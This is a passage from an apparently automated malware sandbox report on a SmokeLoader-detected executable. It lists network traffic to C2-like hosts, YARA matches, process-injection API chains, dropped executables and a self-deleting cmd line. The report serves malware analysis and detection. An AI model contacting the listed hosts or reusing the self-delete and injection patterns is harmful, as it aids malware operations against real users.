2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=485425442358926&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: Bm9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yubswhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49759 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: AA02.exe, 00000016.00000002.527637777.000000000088A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        .NET source code contains very large array initializations
                        Source: C169.exe.4.dr, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.1.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.0.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.2.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.3.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.2.C169.exe.900000.0.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.2.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.5.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.7.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        PE file contains section with special chars
                        Source: D375.exe.4.drStatic PE information: section name:
                        PE file has nameless sections
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520
                        Source: QMn13jz6nj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: A70A.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: D466.exe.4.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                        Source: D466.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: ddigjgj.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\explorer.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeSection loaded: mscorjit.dll
                        Source: sqlite3[1].dll.22.drStatic PE information: Number of sections : 19 > 10
                        Source: sqlite3.dll.22.drStatic PE information: Number of sections : 19 > 10
                        Source: QMn13jz6nj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: 23.2.C169.exe.2f893c6.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                        Source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: String function: 00404850 appears 458 times
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402491 NtOpenKey,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05215368 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052152B0 NtUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05215363 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052152A8 NtUnmapViewOfSection,
                        Source: QMn13jz6nj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: D466.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: ddigjgj.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: A70A.exe.4.drStatic PE information: Section: ZLIB complexity 1.00011934878
                        Source: D375.exe.4.drStatic PE information: Section: ZLIB complexity 1.00025390625
                        Source: D375.exe.4.drStatic PE information: Section: ZLIB complexity 0.98994140625
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddigjgj
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/32@65/4
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile read: C:\Users\user\Desktop\desktop.ini
                        Source: QMn13jz6nj.exeVirustotal: Detection: 47%
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A70A.exe C:\Users\user\AppData\Local\Temp\A70A.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D466.exe C:\Users\user\AppData\Local\Temp\D466.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AA02.exe C:\Users\user\AppData\Local\Temp\AA02.exe
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D375.exe C:\Users\user\AppData\Local\Temp\D375.exe
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
